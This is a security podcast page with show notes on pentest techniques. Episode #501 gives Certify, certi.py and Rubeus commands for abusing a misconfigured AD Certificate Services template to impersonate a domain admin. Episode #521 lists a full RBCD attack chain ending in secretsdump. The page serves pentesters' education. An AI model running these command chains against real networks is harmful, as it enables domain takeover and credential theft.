7MS #501: Tales of Pentest Pwnage - Part 31
7 Minute Security29 Joulu 2021

7MS #501: Tales of Pentest Pwnage - Part 31

Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows:

Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed:

msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT

Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands:

sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME

From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do:

rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER

And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!

Jaksot(703)

7MS #526: Tales of Pentest Pwnage - Part 37

7MS #526: Tales of Pentest Pwnage - Part 37

Today's another fun tale of pentest pwnage - specifically focused on cracking a hash type I'd never paid much attention to before: cached domain credentials. I also learned that you can at least partially protect against this type of hash being captured by checking out this article, which has you set the following setting in GPO: Under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options set Interactive logon: Number of previous logons to cache to 0. Be careful, as you will have login problems if a domain controller is not immediately accessible! In regards to defending against secretsdump, this article I found this article to be super interesting.

24 Kesä 202234min

7MS #525: First Impressions of InsightIDR - Part 2

7MS #525: First Impressions of InsightIDR - Part 2

Today we're sharing an updates to episode #512 where we ran Rapid7's InsightIDR through a bunch of attacks: Active Directory enumeration via SharpHound Password spraying through Rubeus Kerberoasting and ASREPRoasting via Rubeus Network protocol poisoning with Inveigh. Looking for a free way to detect protocol poisoning? Check out CanaryPi. Hash dumping using Impacket. I also talk about an interesting Twitter thread that discusses the detection of hash dumping. Pass-the-hash attacks with CrackMapExec In today's episode I share some emails and conversations we had with Rapid7 about these tests and their results. I'm also thrilled to share with you the articles themselves: Getting Started with Rapid7 InsightIDR: A SIEM Tutorial Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

17 Kesä 202233min

7MS #524: How to Update VMWare ESXi From the Command Line

7MS #524: How to Update VMWare ESXi From the Command Line

I'm extra psyched today, because today's episode (which is all about updating your VMWare ESXi version via command line) is complemented by video: https://www.youtube.com/watch?v=0-XAO32LEPY Shortly after recording this video, I found this awesome article which walks you through a different way to tackle these updates: List all upgrade profiles: esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml Grep for just the ones you want (in my case ESXi 7.x): esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0 Apply the one you want! esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0

10 Kesä 202233min

7MS #523: Local Administrator Password Solution - RELOADED!

7MS #523: Local Administrator Password Solution - RELOADED!

Well friends, it has been a while since we talked about Microsoft's awesome Local Administrator Password Solution - specifically, the last time was way back in 2017! Lately I've been training some companies on how to install it by giving them a live walkthrough in our Light Pentest LITE lab, so I thought it would be a good time to write up a refreshed, down and dirty install guide. Here we go! (See the show notes for today's episode for more details!)

3 Kesä 202238min

7MS #522: Pwning Wifi PSKs and PMKIDs with Bettercap - Part 2

7MS #522: Pwning Wifi PSKs and PMKIDs with Bettercap - Part 2

Hey friends, a while back in episode #505 we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in on just the networks you're interested in and filter out a bunch of noisy events from bettercap in the process.

27 Touko 202235min

7MS #521: Tales of Pentest Pwnage - Part 36

7MS #521: Tales of Pentest Pwnage - Part 36

Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD: # From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domain\some.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources. Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!

20 Touko 202257min

7MS #520: How to Succeed in Business Without Really Crying - Part 11

7MS #520: How to Succeed in Business Without Really Crying - Part 11

Hey friends, today we're giving another peek behind the curtain of what it's like to run a cybersecurity consultancy. Topics include: Setting the right communication cadence - and communication channels - with a customer during a pentest. Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here). How we're using Intercom to publish self-help/FAQ articles for 7MS.

13 Touko 202248min

7MS #519: Tales of Pentest Pwnage - Part 35

7MS #519: Tales of Pentest Pwnage - Part 35

Hey friends, it's another fun tale of pentest pwnage today! This one talks about cool things you can do when you have full rights over an OU in Active Directory. Important links to review: BloodHound edges DACL Trouble: Generic All on OUs AD prep bug in Windows Server 2016

7 Touko 202246min

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